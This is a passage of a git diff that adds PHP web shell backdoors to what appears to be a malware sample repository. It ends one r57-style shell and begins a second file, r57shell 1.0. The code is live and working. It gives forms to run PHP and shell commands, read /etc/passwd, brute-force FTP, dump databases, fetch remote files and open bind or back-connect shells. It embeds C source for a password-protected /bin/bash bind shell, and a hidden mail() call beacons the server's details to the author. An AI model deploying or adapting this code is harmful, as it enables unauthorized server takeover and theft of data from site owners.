)".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font; +echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"ghhghh.php\");\r\n//readfile(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; +$creator=base64_decode("cjU3c3NoQGdtYWlsLmNvbQ=="); +($safe_mode)?($safez="ON"):($safez="OFF_HEHE"); +$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; +$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; +$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; +$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">"; +mail( $creator, $subj, $msg, $from); +if($safe_mode&&$curl_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mysql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$mssql_on) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&$unix&&function_exists('mb_send_mail')){ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_list')){ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode&&function_exists('imap_body')){ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if($safe_mode) +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(@ini_get('file_uploads')){ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +if(!$safe_mode&&$unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from ghhghh")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&$unix){ +echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ a.S.c - LONG LIVE ETHNIC ALBANIA ( www.asc.sh ) | <a href=http://www.asc.sh/ target=_blank>WWW.XSHQIPTARETX.ORG</a> | <a href=irc://irc.ascnet.biz/asc target=_blank>IRC.ASCNET.BIZ</a> | version ".$version." ]---o</b></font></div></td></tr></table>"; +echo '</body></html>'; + + +?> + + +<html> +<script language=JavaScript> +<!-- +/* status */ + + function one() + {window.status = " :::... !!! ASCRIMEZ NETWORK @ IRC.ASCNET.BIZ => [ ALBOSS PARADISE ] !!! ...::: "; + setTimeout("two()",60); + } + function two() + {window.status = " :::... !!! ASCRIMEZ NETWORK @ IRC.ASCNET.BIZ => [ ALBOSS PARADISE ] !!! ...::: "; + setTimeout("three()",120); + } + function three() + {window.status = " :::... !!! ASCRIMEZ NETWORK @ IRC.ASCNET.BIZ => [ ALBOSS PARADISE ] !!! ...::: "; + setTimeout("one()",180); + } + one(); +// --> +</SCRIPT> +</html> + +<!-- ALBANIA (n) SECURITY CLAN --> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.am b/PHP/Backdoor.PHP.Rst.am new file mode 100644 index 00000000..00df653f --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.am @@ -0,0 +1,429 @@ +<? +/******************************************************************************************************/ +/* +/* __________ ___ ___ +/* \______ \__ __ ______/ | \ +/* | _/ | \/ ___/ _ \ +/* | | \ | /\___ \\ / +/* |____|_ /____//____ >\___|_ / +/* -======\/==security=\/=team==\/ +/* +/* SPECIAL xbIx birthday edition +/* +/* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð +/* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru èëè www.rsteam.ru +/* Âåðñèÿ 1.0 beta (ïèñàëàñü ïðàêòè÷åñêè íà êîëåíêå... òàê ÷òî êîä ñûðîâàò... äëÿ òåñòèðîâàíèÿ) +/* +/* Âîçìîæíîñòè: +/* ~ çàùèòà ñêðèïòà ñ ïîìîùüþ ïàðîëÿ +/* ~ âûïîëíåíèå øåëë-êîìàíä +/* ~ çàãðóçêà ôàéëîâ íà ñåðâåð +/* ~ ïîääåðæèâàåò àëèàñû êîìàíä +/* ~ âêëþ÷åíû 4 àëèàñà êîìàíä: +/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì +/* - ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì +/* - ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php +/* - ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ +/* ~ äâà ÿçûêà èíòåðôåéñà: ðóññêèé, àíãëèéñêèé +/* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò +/* +/* 05.03.2004 (c) RusH security team +/* +/******************************************************************************************************/ + +## Àóòåíòèôèêàöèÿ + +## Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó +## ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!! +$name="r57"; ## ëîãèí ïîëüçîâàòåëÿ +$pass="r57"; ## ïàðîëü ïîëüçîâàòåëÿ + +if(!isset($PHP_AUTH_USER)) + { + Header('WWW-Authenticate: Basic realm="r57shell"'); + Header('HTTP/1.0 401 Unauthorized'); + exit; + } +else + { + if(($PHP_AUTH_USER != $name ) || ($PHP_AUTH_PW != $pass)) + { + Header('WWW-Authenticate: Basic realm="r57shell"'); + Header('HTTP/1.0 401 Unauthorized'); + exit; + } + } + +error_reporting(0); +set_time_limit(0); + + +/* +Âûáîð ÿçûêà +$language='ru' - ðóññêèé +$language='eng' - àíãëèéñêèé +*/ + +$language='ru'; + +$lang=array( + 'ru_text1' => 'Âûïîëíåííàÿ êîìàíäà', + 'ru_text2' => 'Âûïîëíåíèå êîìàíä íà ñåðâåðå', + 'ru_text3' => 'Âûïîëíèòü êîìàíäó', + 'ru_text4' => 'Ðàáî÷àÿ äèðåêòîðèÿ', + 'ru_text5' => 'Çàãðóçêà ôàéëîâ íà ñåðâåð', + 'ru_text6' => 'Ëîêàëüíûé ôàéë', + 'ru_text7' => 'Àëèàñû', + 'ru_text8' => 'Âûáåðèòå àëèàñ', + 'ru_butt1' => 'Âûïîëíèòü', + 'ru_butt2' => 'Çàãðóçèòü', + 'ru_text9' => 'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash', + 'ru_text10' => 'Îòêðûòü ïîðò', + 'ru_text11' => 'Ïàðîëü äëÿ äîñòóïà', + 'ru_butt3' => 'Îòêðûòü', + + 'eng_text1' => 'Executed command', + 'eng_text2' => 'Execute command on server', + 'eng_text3' => '&nbsp;Run command', + 'eng_text4' => 'Work directory', + 'eng_text5' => 'Upload files on server', + 'eng_text6' => 'Local file', + 'eng_text7' => 'Aliases', + 'eng_text8' => 'Select alias', + 'eng_butt1' => 'Execute', + 'eng_butt2' => 'Upload', + 'eng_text9' => 'Bind port to /bin/bash', + 'eng_text10' => 'Port', + 'eng_text11' => 'Password for access', + 'eng_butt3' => 'Bind' + ); + + + +/* +Àëèàñû êîìàíä +Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè ) +Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû. +*/ + +$aliases=array( +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ +'find all suid files' => 'find / -type f -perm -04000 -ls', + +/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ +'find all sgid files' => 'find / -type f -perm -02000 -ls', + +/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ +'find config.inc.php files' => 'find / -type f -name config.inc.php', + +/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ +'find writable directories and files' => 'find / -perm -2 -ls', +'----------------------------------------------------------------------------------------------------' => 'ls -la' +); + +/* Port bind source */ +$port_bind_bd_c=" +#include <stdio.h> +#include <string.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <netinet/in.h> +#include <errno.h> +int main(argc,argv) +int argc; +char **argv; +{ +int sockfd, newfd; +char buf[30]; +struct sockaddr_in remote; +if(argc < 3) usage(argv[0]); +if(fork() == 0) { // Îòâåòâëÿåì íîâûé ïðîöåññ +remote.sin_family = AF_INET; +remote.sin_port = htons(atoi(argv[1])); +remote.sin_addr.s_addr = htonl(INADDR_ANY); +sockfd = socket(AF_INET,SOCK_STREAM,0); +if(!sockfd) perror(\"socket error\"); +bind(sockfd, (struct sockaddr *)&remote, 0x10); +listen(sockfd, 5); +while(1) +{ +newfd=accept(sockfd,0,0); +dup2(newfd,0); +dup2(newfd,1); +dup2(newfd,2); +write(newfd,\"Password:\",10); +read(newfd,buf,sizeof(buf)); +if (!chpass(argv[2],buf)) +system(\"echo welcome to r57 shell && /bin/bash -i\"); +else +fprintf(stderr,\"Sorry\"); +close(newfd); +} +} +} +int usage(char *progname) +{ +fprintf(stderr,\"USAGE:%s <port num> <password>\n\",progname); +exit(0); +} +int chpass(char *base, char *entered) { +int i; +for(i=0;i<strlen(entered);i++) +{ +if(entered[i] == '\n') +entered[i] = '\0'; +} +if (!strcmp(base,entered)) +return 0; +}"; + +?> +<!-- Çäðàâñòâóé Âàñÿ --> +<html> +<head> +<title>r57shell</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +<STYLE> +tr { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +td { +BORDER-RIGHT: #aaaaaa 1px solid; +BORDER-TOP: #eeeeee 1px solid; +BORDER-LEFT: #eeeeee 1px solid; +BORDER-BOTTOM: #aaaaaa 1px solid; +} +table { +BORDER-RIGHT: #eeeeee 2px outset; +BORDER-TOP: #eeeeee 2px outset; +BORDER-LEFT: #eeeeee 2px outset; +BORDER-BOTTOM: #eeeeee 2px outset; +BACKGROUND-COLOR: #D4D0C8; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +select { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +submit { +BORDER-RIGHT: buttonhighlight 2px outset; +BORDER-TOP: buttonhighlight 2px outset; +BORDER-LEFT: buttonhighlight 2px outset; +BORDER-BOTTOM: buttonhighlight 2px outset; +BACKGROUND-COLOR: #e4e0d8; +width: 30%; +} +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; 